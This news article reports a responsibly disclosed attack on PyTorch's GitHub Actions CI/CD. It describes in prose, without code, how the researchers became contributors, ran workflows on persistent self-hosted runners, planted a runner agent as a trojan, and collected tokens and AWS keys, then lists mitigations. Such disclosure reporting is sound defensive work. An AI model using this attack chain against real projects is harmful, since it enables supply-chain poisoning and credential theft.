Researchers demo new CI/CD attack techniques in PyTorch supply-chain

A pair of security researchers managed to infiltrate the development infrastructure for PyTorch by using new techniques that exploit insecure configurations in GitHub Actions workflows. Their proof-of-concept attack was responsibly disclosed to PyTorch lead developer Meta AI, but other software development organizations that use GitHub Actions have likely made the same deployment mistakes, potentially exposing themselves to software supply-chain attacks.

“Our exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies – the list goes on,” security researcher John Stawinski said in a detailed write-up about the attack on his personal blog. “In short, it was bad. Quite bad.”

Stawinski devised the attack together with colleague Adnan Khan. They both work as security engineers for cybersecurity firm Praetorian and last summer began investigating and developing a new class of exploits for continuous integration and continuous delivery (CI/CD) platforms. One of their first targets was GitHub Actions, a CI/CD service that allows GitHub users to automate the building and testing of software code by defining workflows that execute automatically inside containers on either GitHub’s or the user’s own infrastructure.

Khan initially found a critical vulnerability that could have led to the poisoning of GitHub Actions’ official runner images. The “runners” are the virtual machines (VMs) that execute build actions defined inside GitHub Actions workflows. After reporting the vulnerability to GitHub and receiving a $20,000 bug bounty for it, Khan realized that the core issue he found was systemic and that thousands of other repositories were likely impacted.

Since then, Khan and Stawinski found vulnerabilities in the software repositories and development infrastructure of major corporations and software projects and collected hundreds of thousands of dollars in rewards through bug bounty programs. Their “victims” included Microsoft Deepspeed, a Cloudflare application, the TensorFlow machine-learning library, the crypto wallets and nodes of several blockchains, and PyTorch, one of the most widely used open-source machine-learning frameworks.

PyTorch was originally developed by Meta AI, a subsidiary of Meta (formerly Facebook), but its development is now governed by the PyTorch Foundation, an independent organization that operates under the Linux Foundation’s umbrella.

“We began by discovering every nuance of GitHub Actions exploitation, executing tools, tactics, and procedures (TTPs) that had never been seen before in the wild,” Stawinski said in a blog post earlier this month. “As our research advanced, we evolved our TTPs to attack multiple CI/CD platforms, including GitHub Actions, Buildkite, Jenkins, and CircleCI.”

Running self-hosted GitHub Actions runners is risky

GitHub offers different types of preconfigured “runners” (Windows, Linux, and macOS) that run directly on GitHub’s infrastructure and can be used to test and build applications for those operating systems. However, users also have the option of deploying the GitHub Actions build agent on their own infrastructures and linking it to their GitHub organization and repositories. These are known as self-hosted runners and offer several benefits such as running different versions of operating systems and combinations of hardware as well as additional software tools that GitHub’s hosted runners don’t provide.

Given this flexibility, it’s not surprising that many projects and organizations choose to deploy self-hosted runners. This was also the case for PyTorch, which makes extensive use of both GitHub-hosted and self-hosted build agents. The organization has more than 70 different GitHub workflow files in its repositories and typically runs over ten workflows per hour.

Actions workflows are defined in .yml files which contain instructions in YAML syntax of what commands to execute and on which runner. These workflows are triggered automatically on different events — for example, pull_request — when someone proposes a code change to a repository branch. This is useful because the workflow will trigger and can run, for example, a series of tests on the code before a human reviewer even look at it and decides to merge it.

“It doesn’t help that some of GitHub’s default settings are less than secure,” Stawinski said. “By default, when a self-hosted runner is attached to a repository, any of that repository’s workflows can use that runner. This setting also applies to workflows from fork pull requests [PRs]. Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR.”

A fork pull request means that someone created a personal copy (a fork) of that repository, worked on it, and now is trying to merge back the changes. This is standard practice as contributors will often work in their own forks before submitting the changes back to the main repository for approval.

From GitHub’s perspective, a “contributor” is anyone whose pull requests were merged back into the default branch and the default setting for workflow execution is to automatically execute on fork pull requests from past contributors. This means that if someone ever had a fork PR merged, workflows will automatically execute for all their future fork PRs. This setting can be changed to require approval before executing workflows on all fork PRs whether the owner is a past contributor or not.

“Viewing the pull request history, we found several PRs from previous contributors that triggered pull_request workflows without requiring approval,” the researchers said. “This indicated that the repository did not require workflow approval for fork PRs from previous contributors. Bingo.”

So an attacker would need to first become a contributor by submitting a legitimate fork PR that gets merged and then they could abuse their newly gained privilege, create a fork, write a malicious workflow file inside it, and make a pull request. This will automatically get their malicious workflow executed on the organization’s self-hosted GitHub Actions runner.

This sounds like a lot of work, but it’s not. You don’t need to add new features to a project to become a contributor. The researchers gained contributor status to PyTorch by finding a typo in a documentation file and making a PR to fix it. Once their minor grammar fix was accepted, they had the ability to execute malicious workflows.

Using the GitHub Actions runner as a trojan

Another default behavior of self-hosted GitHub Actions runners is that they are non-ephemeral. They aren’t reset and wiped once a workflow completes. “This means that the malicious workflow can start a process in the background that will continue to run after the job completes, and modifications to files (such as programs on the path, etc.) will persist past the current workflow,” the researchers said. “It also means that future workflows will run on that same runner.”

This makes it a good target for deploying something like a trojan that connects back to the attackers and then collects all possible sensitive information exposed by future workflow executions. But what to use as a trojan that wouldn’t be detected by antivirus products or whose communications wouldn’t get blocked? The GitHub Actions runner agent itself, or rather another instance of it that’s not linked to the PyTorch organization but to a GitHub organization controlled by the attackers.

“Our ‘Runner on Runner’ (RoR) technique uses the same servers for C2 as the existing runner, and the only binary we drop is the official GitHub runner agent binary, which is already running on the system. See ya, EDR and firewall protections,” Stawinski said.

Extracting sensitive access tokens

Up until this step, the attackers managed to get a very stealthy trojan program running inside a machine that’s part of the organization’s development infrastructure and which is used to execute sensitive jobs as part of its CI/CD pipeline. The next step is post-exploitation: trying to exfiltrate sensitive data and pivot to other parts of the infrastructure.

Workflows often include access tokens to GitHub itself or other third-party services. These tokens are required for the jobs that are defined in the workflow to execute correctly. For example, the build agent needs read privileges to check out the repository first and might also need write access to publish the resulting binary as a new release or to modify existing releases.

These tokens are stored on the filesystem of the runner in various locations like the.git configuration file or in environment variables and can obviously be read by the stealthy “trojan” that runs with root privileges. Some, such as GITHUB_TOKEN, are ephemeral and only valid during the execution of the workflow, but the researchers found ways to extend their life. Even if they wouldn’t have found these methods, new workflows with newly generated tokens are executed all the time on a busy repository like PyTorch, so there are plenty of new ones to collect.

“The PyTorch repository used GitHub secrets to allow the runners to access sensitive systems during the automated release process,” Stawinski said. “The repository used a lot of secrets, including several sets of AWS keys and GitHub Personal Access Tokens (PATs).”

PATs are often over privileged and are an attractive target for attackers, but in this case they were used as part of other workflows that were not executing on the compromised self-hosted runner. However, the researchers found ways to use the ephemeral GitHub tokens they were able to collect to place malicious code into workflows that were executing on other runners and contained those PATs.

“It turns out that you can’t use a GITHUB_TOKEN to modify workflow files,” Stawinski said. “However, we discovered several creative…’workarounds’…that will let you add malicious code to a workflow using a GITHUB_TOKEN. In this scenario, weekly.yml used another workflow, which used a script outside the .github/workflows directory. We could add our code to this script in our branch. Then, we could trigger that workflow on our branch, which would execute our malicious code. If this sounds confusing, don’t worry; it also confuses most bug bounty programs.”

In other words, even if an attacker can’t modify a workflow directly, they might be able to modify an external script that is called by that workflow and get their malicious code in that way. Repositories and CI/CD workflows can get quite complex with many interdependencies, so such small oversights are not uncommon.

Even without the PATs, the GITHUB_TOKEN alone with write privileges would have been enough to poison PyTorch’s releases on GitHub and separately extracted AWS keys could have been used to backdoor PyTorch releases hosted on the organization’s AWS account. “There were other sets of AWS keys, GitHub PATs, and various credentials we could have stolen, but we believed we had a clear demonstration of impact at this point,” the researchers said. “Given the critical nature of the vulnerability, we wanted to submit the report as soon as possible before one of PyTorch’s 3,500 contributors decided to make a deal with a foreign adversary.”

Mitigating risk from CI/CD workflows

There are many lessons to learn from this attack for software development organizations: from the risks associated with running self-hosted GitHub Actions runners in default configurations to the risks of having workflows that execute scripts from outside the workflows directory to risks associated with overprivileged access tokens and legitimate applications repurposed as trojans — other researchers did this before with Amazon’s AWS System Manager agent and with Google’s SSO and device management solution for WIndows.

“Securing and protecting the runners is the responsibility of end users, not GitHub, which is why GitHub recommends against using self-hosted runners on public repositories,” Stawinski said. “Apparently, not everyone listens to GitHub, including GitHub.”

However, if self-hosted runners are necessary, organizations should at the very least consider changing the default setting of “Require approval for first-time contributors” to “Require approval for all outside collaborators.” It’s also a good idea to make self-hosted runners ephemeral and to execute workflows from fork PRs only on GitHub-hosted runners.

This is not the first time when insecure use of GitHub Actions features has generated software supply-chain security risks. Other CI/CD services and platforms have also had their own vulnerabilities and insecure default configurations. “The issues surrounding these attack paths are not unique to PyTorch,” the researchers said. “They’re not unique to ML repositories or even to GitHub. We’ve repeatedly demonstrated supply chain weaknesses by exploiting CI/CD vulnerabilities in the world’s most advanced technological organizations across several CI/CD platforms, and those are only a small subset of the greater attack surface.”

Supply Chain, Vulnerabilities